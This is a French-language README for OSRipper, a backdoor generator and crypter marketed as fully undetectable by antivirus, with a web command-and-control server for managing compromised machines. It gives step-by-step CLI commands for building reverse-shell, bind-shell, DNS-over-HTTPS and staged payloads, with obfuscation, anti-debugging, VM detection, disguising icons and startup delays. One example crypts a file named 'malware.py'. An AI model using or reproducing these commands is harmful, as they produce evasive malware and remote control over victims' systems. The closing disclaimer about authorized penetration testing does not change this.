
Backdoor et Framework de crypter multi-plateforme contournant les antivirus avec une interface web légère intégrée

Générateur de payloads multiplateforme avancé et crypteur avec capacités FUD
Fonctionnalités • Démarrage rapide • Interface Web • Types de payloads • Documentation
OSRipper est un générateur de portes dérobées et un crypteur sophistiqué, totalement indétectable (FUD), conçu pour les tests d'intrusion autorisés et les opérations d'équipe rouge. Il intègre des techniques d'évasion avancées, plusieurs types de payloads et une interface C2 moderne basée sur le web pour la gestion des systèmes compromis.
| Type de payload | Description | Cas d'utilisation |
|---|---|---|
| Shell liant | Ouvre un port sur la machine victime | Accès direct lorsque les connexions inversées sont bloquées |
| Meterpreter inverse TCP | Connexion inverse chiffrée SSL/TLS | Tests d'intrusion standard |
| C2 DNS-over-HTTPS | Canal C2 furtif basé sur DoH | Contourner les restrictions réseau |
| C2 HTTPS | C2 HTTPS avec épinglage de certificat | Canal C2 sécurisé et authentifié |
| Payload étagé | Livraison web multi-étapes | Déploiement furtif renforcé |
| Crypteur de code personnalisé | Obfusquer tout script Python | Chiffrement de payload personnalisé |
# Clone du dépôt
git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper
# Installation des dépendances
pip3 install -r requirements.txt
# Installation du paquet
pip3 install -e .
Important — exécutez la configuration pour les fonctionnalités optionnelles (ngrok, compilation binaire) :
Sur de nombreux systèmes (notamment Linux avec un environnement Python géré de manière externe), vous devez exécuter la configuration intégrée pour que les dépendances optionnelles soient installées dans le venv propre à OSRipper. Faites-le une fois après l'installation :
osripper-cli setup
Ceci crée ~/.local/share/osripper/venv, y installe pyngrok, nuitka et sandboxed, et toutes les exécutions ultérieures de osripper / osripper-cli les utiliseront automatiquement. Sans cela, les options --ngrok et --compile vous demanderont d'exécuter la configuration. Utilisez osripper-cli setup --system uniquement si vous préférez une installation pip système/utilisateur plutôt que le venv.
Mode interactif :
osripper
# ou
python3 -m osripper
Ligne de commande :
# Générer un shell inverse
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --compile
# Générer un payload C2 DoH
osripper-cli doh -d example.com --obfuscate --compile
Interface Web :
# Démarrer le serveur C2 avec l'interface Web
python -m osripper.c2.server example.com --port 5000
# Accéder au tableau de bord à http://localhost:5000
OSRipper inclut une interface C2 moderne basée sur le web pour la gestion des systèmes compromis.
# Utilisation de base
python -m osripper.c2.server example.com
# Avec HTTPS
python -m osripper.c2.server example.com --https
# Port personnalisé
python -m osripper.c2.server example.com --port 8080
# Avec certificat personnalisé
python -m osripper.c2.server example.com --https --cert server.crt --key server.key
Une fois le serveur en cours d'exécution, accédez au tableau de bord à :
http://localhost:5000https://localhost:5000 (si activé)Ouvre un port sur la machine victime et attend les connexions.
osripper-cli bind -p 4444 --obfuscate --compile
Connexion :
msfconsole -q -x 'use python/meterpreter/bind_tcp; set RHOST target_ip; set RPORT 4444; exploit'
Connexion inverse chiffrée avec SSL/TLS.
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --enhanced --compile
Canal C2 furtif utilisant le protocole DNS-over-HTTPS. Contourne de nombreuses restrictions réseau.
# Générer le payload
osripper-cli doh -d example.com --obfuscate --compile
# Démarrer le serveur C2
python -m osripper.c2.server example.com
Fonctionnalités :
C2 HTTPS sécurisé avec épinglage de certificat pour l'authentification.
# Générer le payload (via l'interface Web ou CLI)
# Démarrer le serveur C2 avec HTTPS
python -m osripper.c2.server example.com --https
# Obtenir l'empreinte du certificat
curl http://localhost:5000/api/cert-fingerprint
Fonctionnalités :
Livraison web multi-étapes pour une furtivité renforcée.
osripper-cli staged -H 192.168.1.100 -p 8080 --obfuscate
Obfusquer et chiffrer tout script Python.
osripper-cli custom --script mypayload.py --obfuscate --enhanced --compile
| Option | Description |
|---|---|
--obfuscate | Activer l'obfuscation multicouche |
--enhanced | Obfuscation renforcée (anti-débogage, détection VM) |
--compile | Compiler en binaire autonome |
--icon CHEMIN | Icône personnalisée pour le binaire compilé |
--delay | Ajouter un délai de démarrage aléatoire (5-15 secondes) |
--output, -o NOM | Nom du fichier de sortie |
--quiet, -q | Mode silencieux (sortie minimale) |
# Shell inverse complet
osripper-cli reverse -H 192.168.1.100 -p 4444 \
--obfuscate --enhanced --compile --icon app.ico --delay
# C2 DoH avec toutes les fonctionnalités
osripper-cli doh -d example.com \
--obfuscate --enhanced --compile --delay
# Chiffrement de script personnalisé
osripper-cli custom --script malware.py \
--obfuscate --enhanced --compile
# Utilisation de ngrok pour IP dynamique
osripper-cli reverse --ngrok -p 4444 --obfuscate --compile

┌─────────────────┐
│ Binaire │
│ généré │
└─────────────────┘
│
│ Exécution
▼
┌──────────────────┐
│ Obfuscateur │
│ (dropper) │
└──────────────────┘
│
│ HTTP/HTTPS/DoH
▼
┌─────────────────┐
│ │
│ SERVEUR C2 │
│ (Interface │
│ Web) │
│ │
└─────────────────┘
│
│ Commande/Réponse
▼
┌─────────────────┐
│ Agent │
│ Exécution │
└─────────────────┘

# Générer un payload avec ngrok
osripper-cli reverse --ngrok -p 4444
# Suivre les invites pour configurer le tunnel
# Exécuter : ngrok tcp 4444
osripper-cli reverse -H 192.168.1.100 -p 4444 \
--compile --icon /path/to/icon.ico
Obfuscation standard :
Obfuscation renforcée :
# Standard
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate
# Renforcée
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --enhanced
# 1. Démarrer le serveur C2 avec HTTPS
python -m osripper.c2.server example.com --https
# 2. Obtenir l'empreinte du certificat
curl http://localhost:5000/api/cert-fingerprint
# 3. Générer le payload avec l'empreinte (via l'interface Web)
# Ou utiliser l'empreinte dans votre génération de payload
Nous accueillons les contributions de la communauté de recherche en sécurité !
git checkout -b feature/amazing-feature)git commit -m 'Ajout d'une fonctionnalité géniale')git push origin feature/amazing-feature)Un remerciement spécial à la communauté de recherche en sécurité et à ces projets :
IMPORTANT : Cet outil est développé à des fins éducatives et pour des tests d'intrusion autorisés uniquement.
Les développeurs ne sont pas responsables d'une mauvaise utilisation de ce logiciel. Les utilisateurs doivent se conformer à toutes les lois et réglementations applicables.